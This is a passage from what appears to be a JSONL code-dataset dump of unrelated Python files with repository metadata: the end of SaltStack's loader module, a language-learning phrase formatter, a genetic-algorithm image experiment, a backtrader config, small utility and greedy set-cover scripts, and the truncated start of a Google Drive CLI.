ret.pack[\"__thorium__\"] = ret\n return ret\n\n\ndef states(\n opts,\n functions,\n utils,\n serializers,\n whitelist=None,\n proxy=None,\n context=None,\n loaded_base_name=None,\n file_client=None,\n):\n \"\"\"\n Returns the state modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader runners: A LazyLoader instance returned from ``runner``.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param LazyLoader serializers: An optional LazyLoader instance returned from ``serializers``.\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n statemods = salt.loader.states(__opts__, None, None)\n \"\"\"\n if context is None:\n context = {}\n\n return LazyLoader(\n _module_dirs(opts, \"states\"),\n opts,\n tag=\"states\",\n pack={\n \"__salt__\": functions,\n \"__proxy__\": proxy or {},\n \"__utils__\": utils,\n \"__serializers__\": serializers,\n \"__context__\": context,\n \"__file_client__\": file_client,\n },\n whitelist=whitelist,\n extra_module_dirs=utils.module_dirs if utils else None,\n pack_self=\"__states__\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef beacons(opts, functions, context=None, proxy=None, loaded_base_name=None):\n \"\"\"\n Load the beacon modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"beacons\"),\n opts,\n tag=\"beacons\",\n pack={\"__context__\": context, \"__salt__\": functions, \"__proxy__\": proxy or {}},\n virtual_funcs=[],\n loaded_base_name=loaded_base_name,\n )\n\n\ndef log_handlers(opts, loaded_base_name=None):\n \"\"\"\n Returns the custom logging handler modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n ret = LazyLoader(\n _module_dirs(\n opts,\n \"log_handlers\",\n ),\n opts,\n tag=\"log_handlers\",\n loaded_base_name=loaded_base_name,\n )\n return FilterDictWrapper(ret, \".setup_handlers\")\n\n\ndef ssh_wrapper(opts, functions=None, context=None, loaded_base_name=None):\n \"\"\"\n Returns the custom logging handler modules\n\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(\n opts,\n \"wrapper\",\n base_path=str(SALT_BASE_PATH / \"client\" / \"ssh\"),\n ),\n opts,\n tag=\"wrapper\",\n pack={\"__salt__\": functions, \"__context__\": context},\n loaded_base_name=loaded_base_name,\n )\n\n\ndef render(\n opts, functions, states=None, proxy=None, context=None, loaded_base_name=None\n):\n \"\"\"\n Returns the render modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param LazyLoader states: A LazyLoader instance returned from ``states``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if context is None:\n context = {}\n\n pack = {\n \"__salt__\": functions,\n \"__grains__\": opts.get(\"grains\", {}),\n \"__context__\": context,\n }\n\n if states:\n pack[\"__states__\"] = states\n\n if proxy is None:\n proxy = {}\n pack[\"__proxy__\"] = proxy\n\n ret = LazyLoader(\n _module_dirs(\n opts,\n \"renderers\",\n \"render\",\n ext_type_dirs=\"render_dirs\",\n ),\n opts,\n tag=\"render\",\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n rend = FilterDictWrapper(ret, \".render\")\n\n if not check_render_pipe_str(\n opts[\"renderer\"], rend, opts[\"renderer_blacklist\"], opts[\"renderer_whitelist\"]\n ):\n err = (\n \"The renderer {} is unavailable, this error is often because \"\n \"the needed software is unavailable\".format(opts[\"renderer\"])\n )\n log.critical(err)\n raise LoaderError(err)\n return rend\n\n\ndef grain_funcs(opts, proxy=None, context=None, loaded_base_name=None):\n \"\"\"\n Returns the grain functions\n\n :param dict opts: The Salt options dictionary\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n grainfuncs = salt.loader.grain_funcs(__opts__)\n \"\"\"\n _utils = utils(opts, proxy=proxy)\n pack = {\"__utils__\": utils(opts, proxy=proxy), \"__context__\": context}\n ret = LazyLoader(\n _module_dirs(\n opts,\n \"grains\",\n \"grain\",\n ext_type_dirs=\"grains_dirs\",\n ),\n opts,\n tag=\"grains\",\n extra_module_dirs=_utils.module_dirs,\n pack=pack,\n loaded_base_name=loaded_base_name,\n )\n ret.pack[\"__utils__\"] = _utils\n return ret\n\n\ndef _format_cached_grains(cached_grains):\n \"\"\"\n Returns cached grains with fixed types, like tuples.\n \"\"\"\n if cached_grains.get(\"osrelease_info\"):\n osrelease_info = cached_grains[\"osrelease_info\"]\n if isinstance(osrelease_info, list):\n cached_grains[\"osrelease_info\"] = tuple(osrelease_info)\n return cached_grains\n\n\ndef _load_cached_grains(opts, cfn):\n \"\"\"\n Returns the grains cached in cfn, or None if the cache is too old or is\n corrupted.\n \"\"\"\n if not os.path.isfile(cfn):\n log.debug(\"Grains cache file does not exist.\")\n return None\n\n grains_cache_age = int(time.time() - os.path.getmtime(cfn))\n if grains_cache_age > opts.get(\"grains_cache_expiration\", 300):\n log.debug(\n \"Grains cache last modified %s seconds ago and cache \"\n \"expiration is set to %s. Grains cache expired. \"\n \"Refreshing.\",\n grains_cache_age,\n opts.get(\"grains_cache_expiration\", 300),\n )\n return None\n\n if opts.get(\"refresh_grains_cache\", False):\n log.debug(\"refresh_grains_cache requested, Refreshing.\")\n return None\n\n log.debug(\"Retrieving grains from cache\")\n try:\n with salt.utils.files.fopen(cfn, \"rb\") as fp_:\n cached_grains = salt.utils.data.decode(\n salt.payload.load(fp_), preserve_tuples=True\n )\n if not cached_grains:\n log.debug(\"Cached grains are empty, cache might be corrupted. Refreshing.\")\n return None\n\n return _format_cached_grains(cached_grains)\n except OSError:\n return None\n\n\ndef grains(opts, force_refresh=False, proxy=None, context=None, loaded_base_name=None):\n \"\"\"\n Return the functions for the dynamic grains and the values for the static\n grains.\n\n :param dict opts: The Salt options dictionary\n :param bool force_refresh: Force the refresh of grains\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n\n Since grains are computed early in the startup process, grains functions\n do not have __salt__ or __proxy__ available. At proxy-minion startup,\n this function is called with the proxymodule LazyLoader object so grains\n functions can communicate with their controlled device.\n\n .. code-block:: python\n\n import salt.config\n import salt.loader\n\n __opts__ = salt.config.minion_config('/etc/salt/minion')\n __grains__ = salt.loader.grains(__opts__)\n print __grains__['id']\n \"\"\"\n # Need to re-import salt.config, somehow it got lost when a minion is starting\n import salt.config\n\n # if we have no grains, lets try loading from disk (TODO: move to decorator?)\n cfn = os.path.join(opts[\"cachedir\"], \"grains.cache.p\")\n if not force_refresh and opts.get(\"grains_cache\", False):\n cached_grains = _load_cached_grains(opts, cfn)\n if cached_grains:\n return cached_grains\n else:\n log.debug(\"Grains refresh requested. Refreshing grains.\")\n\n if opts.get(\"skip_grains\", False):\n return {}\n grains_deep_merge = opts.get(\"grains_deep_merge\", False) is True\n if \"conf_file\" in opts:\n pre_opts = {}\n pre_opts.update(\n salt.config.load_config(\n opts[\"conf_file\"],\n \"SALT_MINION_CONFIG\",\n salt.config.DEFAULT_MINION_OPTS[\"conf_file\"],\n )\n )\n default_include = pre_opts.get(\"default_include\", opts[\"default_include\"])\n include = pre_opts.get(\"include\", [])\n pre_opts.update(\n salt.config.include_config(\n default_include, opts[\"conf_file\"], verbose=False\n )\n )\n pre_opts.update(\n salt.config.include_config(include, opts[\"conf_file\"], verbose=True)\n )\n if \"grains\" in pre_opts:\n opts[\"grains\"] = pre_opts[\"grains\"]\n else:\n opts[\"grains\"] = {}\n else:\n opts[\"grains\"] = {}\n\n grains_data = {}\n blist = opts.get(\"grains_blacklist\", [])\n funcs = grain_funcs(\n opts, proxy=proxy, context=context or {}, loaded_base_name=loaded_base_name\n )\n if force_refresh: # if we refresh, lets reload grain modules\n funcs.clear()\n # Run core grains\n for key in funcs:\n if not key.startswith(\"core.\"):\n continue\n log.trace(\"Loading %s grain\", key)\n ret = funcs[key]()\n if not isinstance(ret, dict):\n continue\n if blist:\n for key in list(ret):\n for block in blist:\n if salt.utils.stringutils.expr_match(key, block):\n del ret[key]\n log.trace(\"Filtering %s grain\", key)\n if not ret:\n continue\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, ret)\n else:\n grains_data.update(ret)\n\n # Run the rest of the grains\n for key in funcs:\n if key.startswith(\"core.\") or key == \"_errors\":\n continue\n try:\n # Grains are loaded too early to take advantage of the injected\n # __proxy__ variable. Pass an instance of that LazyLoader\n # here instead to grains functions if the grains functions take\n # one parameter. Then the grains can have access to the\n # proxymodule for retrieving information from the connected\n # device.\n log.trace(\"Loading %s grain\", key)\n parameters = inspect.signature(funcs[key]).parameters\n kwargs = {}\n if \"proxy\" in parameters:\n kwargs[\"proxy\"] = proxy\n if \"grains\" in parameters:\n kwargs[\"grains\"] = grains_data\n ret = funcs[key](**kwargs)\n except Exception: # pylint: disable=broad-except\n if salt.utils.platform.is_proxy():\n log.info(\n \"The following CRITICAL message may not be an error; the proxy may not be completely established yet.\"\n )\n log.critical(\n \"Failed to load grains defined in grain file %s in \"\n \"function %s, error:\\n\",\n key,\n funcs[key],\n exc_info=True,\n )\n continue\n if not isinstance(ret, dict):\n continue\n if blist:\n for key in list(ret):\n for block in blist:\n if salt.utils.stringutils.expr_match(key, block):\n del ret[key]\n log.trace(\"Filtering %s grain\", key)\n if not ret:\n continue\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, ret)\n else:\n grains_data.update(ret)\n\n if opts.get(\"proxy_merge_grains_in_module\", True) and proxy:\n try:\n proxytype = proxy.opts[\"proxy\"][\"proxytype\"]\n if proxytype + \".grains\" in proxy:\n if (\n proxytype + \".initialized\" in proxy\n and proxy[proxytype + \".initialized\"]()\n ):\n try:\n proxytype = proxy.opts[\"proxy\"][\"proxytype\"]\n ret = proxy[proxytype + \".grains\"]()\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, ret)\n else:\n grains_data.update(ret)\n except Exception: # pylint: disable=broad-except\n log.critical(\n \"Failed to run proxy's grains function!\", exc_info=True\n )\n except KeyError:\n pass\n\n grains_data.update(opts[\"grains\"])\n # Write cache if enabled\n if opts.get(\"grains_cache\", False):\n with salt.utils.files.set_umask(0o077):\n try:\n if salt.utils.platform.is_windows():\n # Late import\n import salt.modules.cmdmod\n\n # Make sure cache file isn't read-only\n salt.modules.cmdmod._run_quiet(f'attrib -R \"{cfn}\"')\n with salt.utils.files.fopen(cfn, \"w+b\") as fp_:\n try:\n salt.payload.dump(grains_data, fp_)\n except TypeError as e:\n log.error(\"Failed to serialize grains cache: %s\", e)\n raise # re-throw for cleanup\n except Exception as e: # pylint: disable=broad-except\n log.error(\"Unable to write to grains cache file %s: %s\", cfn, e)\n # Based on the original exception, the file may or may not have been\n # created. If it was, we will remove it now, as the exception means\n # the serialized data is not to be trusted, no matter what the\n # exception is.\n if os.path.isfile(cfn):\n os.unlink(cfn)\n\n if grains_deep_merge:\n salt.utils.dictupdate.update(grains_data, opts[\"grains\"])\n else:\n grains_data.update(opts[\"grains\"])\n return salt.utils.data.decode(grains_data, preserve_tuples=True)\n\n\n# TODO: get rid of? Does anyone use this? You should use raw() instead\ndef call(fun, **kwargs):\n \"\"\"\n Directly call a function inside a loader directory\n \"\"\"\n args = kwargs.get(\"args\", [])\n dirs = kwargs.get(\"dirs\", [])\n loaded_base_name = kwargs.pop(\"loaded_base_name\", None)\n\n funcs = LazyLoader(\n [str(SALT_BASE_PATH / \"modules\")] + dirs,\n None,\n tag=\"modules\",\n virtual_enable=False,\n loaded_base_name=loaded_base_name,\n )\n return funcs[fun](*args)\n\n\ndef runner(opts, utils=None, context=None, whitelist=None, loaded_base_name=None):\n \"\"\"\n Directly call a function inside a loader directory\n\n :param dict opts: The Salt options dictionary\n :param list whitelist: A list of modules which should be whitelisted.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if utils is None:\n utils = {}\n if context is None:\n context = {}\n return LazyLoader(\n _module_dirs(opts, \"runners\", \"runner\", ext_type_dirs=\"runner_dirs\"),\n opts,\n tag=\"runners\",\n pack={\"__utils__\": utils, \"__context__\": context},\n whitelist=whitelist,\n extra_module_dirs=utils.module_dirs if utils else None,\n # TODO: change from __salt__ to something else, we overload __salt__ too much\n pack_self=\"__salt__\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef queues(opts, loaded_base_name=None):\n \"\"\"\n Directly call a function inside a loader directory\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"queues\", \"queue\", ext_type_dirs=\"queue_dirs\"),\n opts,\n tag=\"queues\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef sdb(opts, functions=None, whitelist=None, utils=None, loaded_base_name=None):\n \"\"\"\n Make a very small database call\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param list whitelist: A list of modules which should be whitelisted.\n :param LazyLoader utils: A LazyLoader instance returned from ``utils``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if utils is None:\n utils = {}\n\n return LazyLoader(\n _module_dirs(opts, \"sdb\"),\n opts,\n tag=\"sdb\",\n pack={\n \"__sdb__\": functions,\n \"__utils__\": utils,\n \"__salt__\": minion_mods(opts, utils=utils),\n },\n whitelist=whitelist,\n extra_module_dirs=utils.module_dirs if utils else None,\n loaded_base_name=loaded_base_name,\n )\n\n\ndef pkgdb(opts, loaded_base_name=None):\n \"\"\"\n Return modules for SPM's package database\n\n .. versionadded:: 2015.8.0\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"pkgdb\", base_path=str(SALT_BASE_PATH / \"spm\")),\n opts,\n tag=\"pkgdb\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef pkgfiles(opts, loaded_base_name=None):\n \"\"\"\n Return modules for SPM's file handling\n\n .. versionadded:: 2015.8.0\n\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"pkgfiles\", base_path=str(SALT_BASE_PATH / \"spm\")),\n opts,\n tag=\"pkgfiles\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef clouds(opts, loaded_base_name=None):\n \"\"\"\n Return the cloud functions\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n _utils = utils(opts)\n # Let's bring __active_provider_name__, defaulting to None, to all cloud\n # drivers. This will get temporarily updated/overridden with a context\n # manager when needed.\n functions = LazyLoader(\n _module_dirs(\n opts,\n \"clouds\",\n \"cloud\",\n base_path=str(SALT_BASE_PATH / \"cloud\"),\n int_type=\"clouds\",\n ),\n opts,\n tag=\"clouds\",\n pack={\"__utils__\": _utils, \"__active_provider_name__\": None},\n extra_module_dirs=_utils.module_dirs,\n loaded_base_name=loaded_base_name,\n )\n for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:\n log.trace(\n \"'%s' has been marked as not supported. Removing from the \"\n \"list of supported cloud functions\",\n funcname,\n )\n functions.pop(funcname, None)\n return functions\n\n\ndef netapi(opts, loaded_base_name=None):\n \"\"\"\n Return the network api functions\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"netapi\"),\n opts,\n tag=\"netapi\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef executors(opts, functions=None, context=None, proxy=None, loaded_base_name=None):\n \"\"\"\n Returns the executor modules\n\n :param dict opts: The Salt options dictionary\n :param LazyLoader functions: A LazyLoader instance returned from ``minion_mods``.\n :param dict context: A Salt context that should be made present inside\n generated modules in __context__\n :param LazyLoader proxy: An optional LazyLoader instance returned from ``proxy``.\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n if proxy is None:\n proxy = {}\n if context is None:\n context = {}\n return LazyLoader(\n _module_dirs(opts, \"executors\", \"executor\"),\n opts,\n tag=\"executor\",\n pack={\"__salt__\": functions, \"__context__\": context, \"__proxy__\": proxy},\n pack_self=\"__executors__\",\n loaded_base_name=loaded_base_name,\n )\n\n\ndef cache(opts, loaded_base_name=None):\n \"\"\"\n Returns the returner modules\n\n :param dict opts: The Salt options dictionary\n :param str loaded_base_name: The imported modules namespace when imported\n by the salt loader.\n \"\"\"\n return LazyLoader(\n _module_dirs(opts, \"cache\", \"cache\"),\n opts,\n tag=\"cache\",\n loaded_base_name=loaded_base_name,\n )\n\n\n@contextlib.contextmanager\ndef catch_entry_points_exception(entry_point):\n context = types.SimpleNamespace(exception_caught=False)\n try:\n yield context\n except Exception as exc: # pylint: disable=broad-except\n context.exception_caught = True\n entry_point_details = entrypoints.name_and_version_from_entry_point(entry_point)\n log.error(\n \"Error processing Salt Extension %s(version: %s): %s\",\n entry_point_details.name,\n entry_point_details.version,\n exc,\n exc_info_on_loglevel=logging.DEBUG,\n )\n","repo_name":"saltstack/salt","sub_path":"salt/loader/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":51396,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"13974476794","text":"import tempfile\n\nfrom .translator import JishoTranslator, GoogleTranslator, Translator\nfrom .splitter import Splitter, JapaneseSplitter, WhiteSpaceSplitter\nfrom gtts import gTTS\nfrom os.path import join\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass, field\n\n\n@dataclass\nclass PhraseFormatter(ABC):\n translator: Translator\n splitter: Splitter\n _temp_dir: str = field(init=False, repr=False, default='')\n\n @property\n def temp_dir(self) -> str:\n return self._temp_dir\n\n @abstractmethod\n def format(self, word) -> str:\n raise NotImplementedError()\n\n def process_phrase(self, phrase, tts_dir) -> str:\n output = ''\n for word in self.splitter.split(phrase):\n output += self.format(word)\n output += '\\n'\n gTTS(text=phrase, lang=self.translator.from_lang, slow=False).save(join(tts_dir, f'{phrase}.mp3'))\n output += GoogleTranslator(self.translator.from_lang, self.translator.to_lang).translate(phrase)\n return output\n\n def run(self, text: str):\n with tempfile.TemporaryDirectory() as tmp_dir:\n self._temp_dir = tmp_dir\n for phrase in Splitter.split_phrases(text):\n yield phrase, self.process_phrase(phrase, tmp_dir)\n\n def run_file(self, input_file):\n with open(input_file) as fd:\n for processed_phrase in self.run(fd.read()):\n yield processed_phrase\n\n\n@dataclass\nclass JapanesePhraseFormatter(PhraseFormatter):\n translator: Translator = JishoTranslator()\n splitter: Splitter = JapaneseSplitter()\n\n def format(self, word: dict) -> str:\n head_formatting = word['orig'] if word['orig'] == word['hira'] else f\"{word['orig']} ({word['hira']})\"\n tail_formatting = self.translator.translate(word['orig'])\n return f\"{head_formatting} = {tail_formatting}\\n\"\n\n\n@dataclass\nclass LanguagePhraseFormatter(PhraseFormatter):\n translator: Translator\n splitter: Splitter = WhiteSpaceSplitter()\n\n cache = {}\n\n def format(self, word: str) -> str:\n if word not in self.cache:\n self.cache[word] = self.translator.translate(word)\n return f'{word} = {self.cache[word]}\\n'\n","repo_name":"ramonhpr/sentence-split-anki-plugin","sub_path":"packages/phrase_formatter.py","file_name":"phrase_formatter.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39558020320","text":"from PIL import Image\nfrom random import randint,random\nimport math\n\nCIRCLE_COUNT = 2\nRADIUS_MIN = 30\nRADIUS_MAX = 32\nPOPULATION_SIZE = 6\nPXOVER = 1\nPMUTATE = 0.5\nROUNDS = 1000\nPOPULATION = []\nNEW_POPULATION = []\nNUM_MUTATIONS = 6\n\ndef black_and_white_dithering(input_image_path,\n output_image_path):\n color_image = Image.open(input_image_path)\n bw = color_image.convert('1',dither=Image.NONE)\n bw.save(output_image_path)\n return bw;\n \ndef get_matrix(input_image):\n im = black_and_white_dithering(\n input_image,\n 'bw.png')\n pixels = list(im.getdata())\n\n width, height = im.size\n print(\"{} x {}\".format(width,height))\n mat = []\n mat_row = []\n for i in range(len(pixels)):\n if (i and i%width == 0):\n mat.append(mat_row)\n mat_row = []\n mat_row.append(1 if pixels[i] else 0)\n mat.append(mat_row)\n return mat, width, height\n\nclass Circle:\n \n def __init__(self,width,height,clone=None):\n self.width = width\n self.height = height\n \n if clone:\n self.radius = clone.radius\n self.x = clone.x\n self.y = clone.y\n self.color = clone.color\n else:\n self.rand_init()\n \n def rand_init(self):\n self.radius = randint(RADIUS_MIN,RADIUS_MAX)\n self.x = randint(1,self.width)\n self.y = randint(1,self.height)\n # self.color = randint(0,1)\n self.color = 0\n self.radius*=self.radius\n\n def get_color(self,xd,yd):\n rx = xd - self.x;\n ry = yd - self.y;\n if ((rx*rx)+(ry*ry)) <= self.radius:\n return self.color\n return -1\n\n def mutate(self):\n self.rand_init()\n self.radius*=self.radius\n\nclass GenoType:\n def __init__(self,width,height,result,clone=False):\n self.circles = []\n self.img = None\n self.width = width\n self.height = height\n self.fitness = -1\n if clone == False:\n for _ in range(CIRCLE_COUNT):\n self.circles.append(Circle(width,height))\n self.result = result\n \n def __eq__(self, other):\n return self.get_fitness() == other.get_fitness();\n\n def __hash__(self):\n return hash(self.get_fitness())\n\n def get_clone(self):\n clone = GenoType(self.width,self.height,self.result,clone=True)\n for circle in self.circles:\n clone.circles.append(Circle(self.width,self.height,circle))\n\n return clone\n\n def compute_img(self):\n img = []\n for x in range(self.width):\n img_row = []\n for y in range(self.height):\n color_count = [0,0]\n for circle in self.circles:\n t = circle.get_color(x,y)\n if t>=0:\n color_count[t]+=1\n img_row.append(0 if color_count[0] > color_count[1] else 1)\n img.append(img_row)\n self.img = img\n\n def store(self,recompute=False,id=1):\n if recompute:\n self.compute_img()\n data = []\n for x in range(self.width):\n for y in range(self.height):\n data.append(255 if self.img[x][y] else 0)\n \n img = Image.new('1', (self.height,self.width))\n img.putdata(data)\n # img.save('{}.png'.format(id))\n img.show()\n\n def get_fitness(self):\n if self.fitness != -1:\n return self.fitness\n self.compute_img()\n fitness = 0\n for x in range(self.width):\n for y in range(self.height):\n if self.result[x][y] == self.img[x][y]:\n fitness+=1\n self.fitness = fitness\n return fitness\n\n def mutate(self):\n invalidate = False\n for circle in self.circles:\n if random() < PMUTATE:\n invalidate = True\n circle.mutate()\n if invalidate:\n self.fitness = -1\n\ndef x_over(A,B):\n A.fitness = -1\n B.fitness = -1\n x_point = randint(1,CIRCLE_COUNT-1)\n for i in range(x_point):\n tmp = A.circles[i]\n A.circles[i] = B.circles[i]\n B.circles[i] = tmp\n\n\ndef init_population(file_name):\n mat,width,height = get_matrix(file_name)\n for i in range(POPULATION_SIZE):\n POPULATION.append(GenoType(height,width,mat));\n\ndef clone_population():\n for gene in POPULATION:\n NEW_POPULATION.append(gene.get_clone())\n\ndef mutate_population():\n for _ in range(NUM_MUTATIONS):\n i = randint(0,POPULATION_SIZE - 1)\n NEW_POPULATION[i].mutate()\n\ndef do_x_over():\n ctr = 0\n one = -1\n\n for i in range(POPULATION_SIZE):\n if random() < PXOVER:\n ctr+=1\n if ctr%2:\n one = i\n else:\n x_over(NEW_POPULATION[one],NEW_POPULATION[i])\n\n\ndef store_population(just_print=False):\n for i in range(POPULATION_SIZE):\n POPULATION[i].get_fitness()\n if just_print == False:\n POPULATION[i].store(id=i)\n\ndef get_unique(p,np):\n x = set()\n for item in p+np:\n x.add(item)\n return [item for item in x]\n\nif __name__ == '__main__':\n x = set()\n init_population(\"japu.png\")\n for gene in POPULATION:\n gene.get_fitness()\n store_population()\n for r_count in range(ROUNDS):\n clone_population()\n do_x_over()\n mutate_population()\n TOTALITY = get_unique(POPULATION,NEW_POPULATION)\n TOTALITY = [gene for gene in sorted(TOTALITY,key = lambda t: t.get_fitness())]\n half = int(POPULATION_SIZE/2)\n POPULATION = TOTALITY[len(TOTALITY) - POPULATION_SIZE : len(TOTALITY)]\n store_population(just_print=True)\n # print(\"done with round\",r_count)\n store_population()\n","repo_name":"earthshakira/road-to-2k","sub_path":"chill/gray.py","file_name":"gray.py","file_ext":"py","file_size_in_byte":5774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33099537376","text":"import backtrader as bt\nfrom strategies.SMACrossoverMulti import SMACrossoverMulti\nimport numpy as np\nfrom comissions.comissions import StocksFixed\n\ndef getConfig():\n\n walkforward_input = {\n 'strategy': SMACrossoverMulti,\n # 'strategy': PercentFollower,\n 'datapath': 'C:\\\\ProgramData\\\\Kibot Agent\\\\Data\\\\30m\\\\',\n # 'datapath': 'C:\\\\TickDownloader\\\\tickdata\\\\',\n 'outputpath': 'results\\\\',\n 'start_date': '2006/01/01',\n 'end_date': '2017/01/01',\n 'n_splits': 2,\n # 'tickers': [['EURUSD','D1','UTC-5','00'],\n # ['GBPUSD', 'D1', 'UTC-5', '00']],\n 'tickers': [['EBAY'], ['AAPL'], ['JNJ']],\n 'extension': 'txt',\n # 'extension': 'csv',\n 'optimization_input': {\n # 'fast': 14,\n # 'slow': 200,\n 'perc_change': np.arange(0.01, 0.1, 0.01),\n 'before_period': 2,\n 'after_period': 1,\n 'trading_start': np.arange(9, 12, 0.5),\n 'trading_length': 8,\n 'filter_off': False,\n 'stop_loss_on': True,\n 'stop_loss': np.arange(0.01, 0.06, 0.01),\n 'printlog': False},\n 'broker_input': {\n 'stdstats': False,\n 'opreturn': False,\n 'cash': 20000,\n 'slippage_perc': 0.001,\n 'comission': StocksFixed,\n 'commvalue': 5,\n 'sizer': bt.sizers.PercentSizer,\n 'percents': 30\n }\n }\n","repo_name":"emindeniz/exterme_bt","sub_path":"configs/PercentFollowerConfig.py","file_name":"PercentFollowerConfig.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"34416184776","text":"# -*- coding: utf-8 -*-\n\"\"\"Este modulo contiene utilidades varias.\"\"\"\n\n\ndef format_json_key(key, value):\n \"\"\"Formatea una clave y un valor en formato JSON.\"\"\"\n if value.lower() not in [\"true\", \"false\"]:\n return '\"%s\": \"%s\"' % (key, value)\n else:\n return '\"%s\": %s' % (key, value)\n\n\ndef format_json(the_list):\n \"\"\"Formatea una lista de claves y valores en un diccionario JSON.\"\"\"\n result = \"{\"\n index = 0\n size = len(the_list)\n while index < size:\n result += format_json_key(the_list[index][0], the_list[index][1])\n if index != size - 1:\n result += \", \"\n index += 1\n result += \"}\"\n return result\n","repo_name":"AnderRasoVazquez/pybox","sub_path":"pybox/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35310063844","text":"states_needed = set([\"mt\",\"wa\",\"or\",\"id\",\"nv\",\"ut\",\"ca\",\"az\"])\nstations = {}\nstations[\"kone\"] = set([\"id\",\"nv\",\"ut\"])\nstations[\"ktwo\"] = set([\"wa\",\"id\",\"mt\"])\nstations[\"kthree\"] = set([\"or\",\"nv\",\"ca\"])\nstations[\"kfour\"] = set([\"nv\",\"ut\"])\nstations[\"kfive\"] = set([\"ca\",\"az\"])\ni = 0\nprint(len(states_needed))\nfinal_station = set()\nwhile states_needed: #这种就可以直接表示集合为空则停止循环\n best_station = None\n states_covered = set() #包含该广播台覆盖的所有未覆盖的洲\n for station, states_for_station in stations.items():\n covered = states_needed & states_for_station\n ##计算交集\n if len(covered) > len(states_covered):\n best_station = station\n states_covered = covered\n ##这个没法停下来\n states_needed -= states_covered\n final_station.add(best_station)\n\nprint(final_station)","repo_name":"enigma-seeking/learn","sub_path":"greed.py","file_name":"greed.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30437005042","text":"#!/usr/bin/env python\n\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nimport json\nimport os\nimport click\n\n@click.group()\ndef cli():\n\t\"\"\"GDrive Management\"\"\"\n\n\ngauth = GoogleAuth()\ngauth.LocalWebserverAuth()\ndrive = GoogleDrive(gauth)\n\naccess_token = 